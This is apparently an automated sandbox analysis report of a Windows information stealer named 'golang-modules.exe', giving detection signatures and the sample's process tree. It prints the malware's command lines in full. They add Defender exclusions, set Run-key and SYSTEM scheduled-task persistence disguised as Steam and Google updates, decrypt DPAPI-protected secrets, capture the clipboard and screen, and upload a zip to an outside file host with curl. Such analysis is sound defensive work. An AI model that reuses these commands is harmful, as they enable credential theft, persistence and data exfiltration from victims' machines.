Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
golang-modules.exe

Overview

General Information

Sample name:golang-modules.exe
Analysis ID:1471277
MD5:5267dcdb0d72961dac15cbbaeae52a23
SHA1:49542b18c8dfc59e98da79f35f7fd77d80ecf944
SHA256:206e0dc156e13faad576578f157f1e0a5f59f4069ee0ada9f7fc38bc0e6a6897
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell adding suspicious path to exclusion list
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Detected generic credential text file
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Deletes files inside the Windows folder
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • golang-modules.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\golang-modules.exe" MD5: 5267DCDB0D72961DAC15CBBAEAE52A23)
    • conhost.exe (PID: 3388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8420 cmdline: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 8440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8448 cmdline: powershell.exe -noprofile - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 8580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 8600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES57FC.tmp" "c:\Users\user\AppData\Local\Temp\oauixwyt\CSC1DE16476F16E4E708A1B2D331C6787A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 8624 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8640 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 8676 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 8696 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 8800 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8828 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8976 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8996 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 9124 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 9144 cmdline: wmic diskdrive get serialnumber MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 9180 cmdline: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • reg.exe (PID: 9200 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 8252 cmdline: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • schtasks.exe (PID: 6432 cmdline: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8336 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 8648 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 1828 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES82F4.tmp" "c:\Users\user\AppData\Local\Temp\wy53vvk1\CSC3C5D7F16B844BD8853D45FBCDF88AC3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 8344 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 5644 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 7688 cmdline: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cscript.exe (PID: 2340 cmdline: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs" MD5: B8454647EFC71192BF7B1572D18F7BD8)
        • cmd.exe (PID: 8528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 8424 cmdline: powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5760 cmdline: powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • reg.exe (PID: 6412 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 4628 cmdline: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • curl.exe (PID: 196 cmdline: curl -o "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 8620 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 8844 cmdline: wmic baseboard get serialnumber MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 8876 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 8856 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • cscript.exe (PID: 8880 cmdline: C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs MD5: B8454647EFC71192BF7B1572D18F7BD8)
      • conhost.exe (PID: 8924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9068 cmdline: powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 720 cmdline: powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • reg.exe (PID: 1760 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 3480 cmdline: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • curl.exe (PID: 3024 cmdline: curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 3400 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 8836 cmdline: wmic path win32_computersystemproduct get uuid MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 8364 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 8344 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 2832 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7296 cmdline: wmic PATH Win32_VideoController GET Description,PNPDeviceID MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 8692 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8784 cmdline: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8424 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip";" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8844 cmdline: curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip"; MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 1048 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5920 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 808 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8088 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7816 cmdline: wmic memorychip get serialnumber MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 2060 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 1248 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 1720 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7556 cmdline: wmic csproduct get uuid MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 5532 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 6360 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • cmd.exe (PID: 5564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 6424 cmdline: wmic cpu get processorid MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 3544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 1704 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 3928 cmdline: C:\Windows\system32\cmd.exe /d /s /c "getmac /NH" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • getmac.exe (PID: 5188 cmdline: getmac /NH MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
    • cmd.exe (PID: 3396 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4436 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1820 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 6408 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 8328 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 9132 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 9076 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\golang-modules.exe", ParentImage: C:\Users\user\Desktop\golang-modules.exe, ParentProcessId: 7476, ParentProcessName: golang-modules.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", ProcessId: 8252, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\golang-modules.exe", ParentImage: C:\Users\user\Desktop\golang-modules.exe, ParentProcessId: 7476, ParentProcessName: golang-modules.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM", ProcessId: 8252, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CzwstUXyiQEbaNB.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", CommandLine: powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8528, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", ProcessId: 8424, ProcessName: powershell.exe
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 8344, StartAddress: EDCAADB0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 8344
